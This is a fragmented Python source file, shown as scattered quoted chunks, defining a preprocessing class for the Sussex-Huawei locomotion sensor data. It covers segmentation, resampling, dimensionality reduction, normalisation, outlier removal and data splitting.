"https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or column is None or", "self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'],", "reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data = pandas.concat([data, reduced],", "isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode is None: return", "['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data,", "necessary for inference. :param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame", "labels = labels test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns", "mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns) != len(args):", "not exact_length: for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove", "non_sequence.cumsum().values selected_data_segments = [group for _, group in selected_data.groupby(grouper)] for segment in selected_data_segments:", "pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return", "self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind],", "= data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'pca': # Source:", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data):", "behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in", "pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced =", "'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca =", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels,", "not isinstance(mode, str) or not isinstance(target_columns, list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity':", "label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels',", "labels test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x',", "selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run", "categorical features using an encoding function. :param data: :param mode: :param columns: :param", "features using an encoding function. :param data: :param mode: :param columns: :param encoding_function:", "range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)):", ":return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame):", "\"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns =", "if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] = encoding_function(data[column])", "standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments = split(data, segment_length) if", "self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current", "== target_label] # 2. Split by non-subsequent indices # Source for next 3", "isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(target_columns, list): raise TypeError(type(data)) if", "data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project accelerometer", "raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names", "interval. :param data: :param mode: :param label_column: :param args: :return: \"\"\" try: if", "or mode is None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "= self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 #", "replacement_mode: :return: \"\"\" try: if data is None or replacement_mode is None or", "= None, mean = None, std = None): \"\"\" Apply z-normalization to a", "value. :param data: :param replacement_mode: :param columns: :param quantile: :param threshold: :return: \"\"\"", "None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError,", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(target_columns,", "/ (data.max() - data.min()) # to center around 0.0 substract 0.5 return data", "not isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean'", "return data if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError,", "and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments = split(data, segment_length)", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation,", "= data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid", "in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode,", "data matrix. :param labels: :param data: :return: \"\"\" try: if data is None", "in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std is None: if", "config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train']", "by non-subsequent indices # Source for next 3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index", ":return: \"\"\" try: if data is None or replacement_mode is None or unwanted_labels", "== 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca", "# 8000 1.25 Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind]", "\"\"\" Remove NaNs :param data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value:", "self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for", "'fixed_interval': segment_length = args[0] aggregate = args[1] exact_length = args[2] segments_aggregated = []", "try: if data is None or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "Combines labels vector and data matrix. :param labels: :param data: :return: \"\"\" try:", "for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for", "class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self, data, mode, label_column=None, args=None): \"\"\"", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns,", "data.index data = data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return", "= data.set_index(old_index) return data if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns = None, mean =", "columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around", "data, remove nans') data = self.convert_unix_to_datetime(data, column = 'time', unit = 'ms') data", "'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "/ std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError, NotImplementedError, ValueError):", "segments = split(data, segment_length) if not exact_length: for segment in segments: segment.index =", "ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train", "data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] =", "#print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] =", "self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' )", "for ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than", "Split by non-subsequent indices # Source for next 3 lines after comment: #", "None or mode is None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function is", "min_length_subsegements = [] for segment in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if", "self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' )", "Source for next 7 lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column", "\"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or", "pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels = labels test_sz = config['pre_proc_test_sz']", "Apply all preprocessing steps necessary for inference. :param data: pandas.DataFrame :param params: List", "if mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html #", "data = data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'pca': #", ":return: pandas.DataFrame \"\"\" try: if data is None or replacement_mode is None: raise", "data: :param columns: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None, axis = 0):", "encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] = encoding_function(data[column]) return", "\"\"\" try: data = None for ind in range(len(data_segments)): if data is None:", "or not isinstance(columns, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) <", "min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to a data set. :param data: :param", "current_representation: :param target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data,", "= data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels)", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError,", "data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)", "if mode == 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode,", "not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/", "not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise", "range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif", "euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs',", "outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments,", "https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "* valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len)", "segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean')", "'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels =", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels)", "= self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] =", "df, chunk_size : numpy.array_split(df, len(df) // chunk_size + 1, axis=0) # 1. Ensure", "run @0.95 for classical approach via TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments,", "for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction')", "column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data,", "= lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size + 1, axis=0) #", "= [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train", "replacement_mode, columns, quantile = None, threshold = None): \"\"\" Removes outlieres either based", "data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality(", "self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind] =", "data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs,", "train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns =", "= reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True) data =", "is None or replacement_mode is None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "data, replacement_mode, columns, quantile = None, threshold = None): \"\"\" Removes outlieres either", "if data is None or replacement_mode is None or unwanted_labels is None: raise", "= pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate data segments_combined = None for", "as value if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try: if data is", "pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels", "#Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train)", "value data_segments = [] for target_label in args: selected_data = data[data[label_column] == target_label]", "params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train =", "mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment in car_test_segments: road_segments = self.segment_data(car_segment,", "reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True) data", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data): \"\"\"", "= (data - data.mean()) / data.std() elif mean is not None and std", "motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data, mean, std", "columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via TS Fresh )[:-2]", "in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments that are too", "std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for", "https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced =", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data, mode, columns, encoding_function):", "if mode == 'labels': # 1. Select all data with desired label value", "args: :return: \"\"\" try: if data is None or target_columns is None or", "= data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return data raise", "ind in range(len(data_segments)): if data is None: data = data_segments[ind][selected_columns] else: data =", "data[columns].std() data[columns] = (data[columns] - data[columns].mean()) / data[columns].std() else: mean = data.mean() std", "is not None: if columns is not None: data[columns] = (data[columns] - mean)", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise", "inference. :param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if", "int(data_len * train_sz) valid_len = int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len)", "'mean') if segments_combined is None: segments_combined = segment else: segments_combined = pandas.concat([segments_combined, segment],", "is None or mode is None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return", "self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100)) return data_train,", "= args[1] exact_length = args[2] segments_aggregated = [] split = lambda df, chunk_size", "std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99", "remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold = None): \"\"\" Removes outlieres", "necessary for training. :param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame", "return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides", "data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid", "or not isinstance(mode, str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode ==", "mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95", "better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns =", "8000 1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better", "not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode", "None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not", "data is None or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "labels: :param data: :return: \"\"\" try: if data is None or labels is", "mode is None: return data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum() except (TypeError,", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\"", "== segment_length: min_length_subsegements.append(segment) if not aggregate: for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]'))", ":param current_representation: :param target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self,", "std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99", "mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "/ data[columns].std() else: mean = data.mean() std = data.std() data = (data -", "data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns,", "columns=None): \"\"\" Apply min-max-normalization to a data set. :param data: :param columns: :return:", "isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function is None:", "have an unwanted label. :param data: :param unwanted_labels: :param replacement_mode: :return: \"\"\" try:", "= None): \"\"\" Apply a dimensionality reduction technique to a data set. :param", "print('Fetch params') #print(params) labels = labels test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz", "data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile',", "fixed interval. :param data: :param mode: :param label_column: :param args: :return: \"\"\" try:", "around 0.0 substract 0.5 return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0:", ":param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params')", "is None or replacement_mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "!= len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation", "NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "train_sz) valid_len = int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test =", "= self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test", "data: :param freq: :param mode: :return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html", "outlier removal') selected_columns = ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train)", "= data[data[label_column] == target_label] # 2. Split by non-subsequent indices # Source for", "data.set_index(old_index) return data if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index =", "= self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data,", "for _, group in selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment) return data_segments if", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation,", "pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides import traceback", "[] for car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for", 